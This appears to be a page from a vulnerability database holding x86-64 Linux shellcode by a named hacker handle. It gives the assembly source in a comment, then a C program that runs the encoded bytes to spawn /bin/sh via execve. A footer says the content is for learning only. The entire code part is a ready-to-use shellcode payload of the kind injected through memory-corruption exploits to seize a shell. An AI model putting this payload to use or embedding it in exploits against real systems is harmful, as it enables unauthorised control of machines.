/* Anderson Eduardo < c0d3_z3r0 > Hack'n Roll http://anderson.hacknroll.com http://blog.hacknroll.com .section .text .globl _start _start: xor %rcx,%rcx jmp string main: popq %rsi movq %rsi,%rdi pushq %rsi pushq %rcx movq %rsp,%rsi movq %rcx,%rdx movb $0x3b,%al syscall string: callq main .string "/bin/sh" */ int main(void) { char shellcode[] = "\x48\x31\xc9" "\xeb\x10" "\x5e" "\x48\x89\xf7" "\x56" "\x51" "\x48\x89\xe6" "\x48\x89\xca" "\xb0\x3b" "\x0f\x05" "\x48\xe8\xea\xff\xff\xff" "\x2f" "\x62" "\x69" "\x6e" "\x2f" "\x73\x68"; (*(void (*)()) shellcode)(); //Hack'n Roll return 0; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论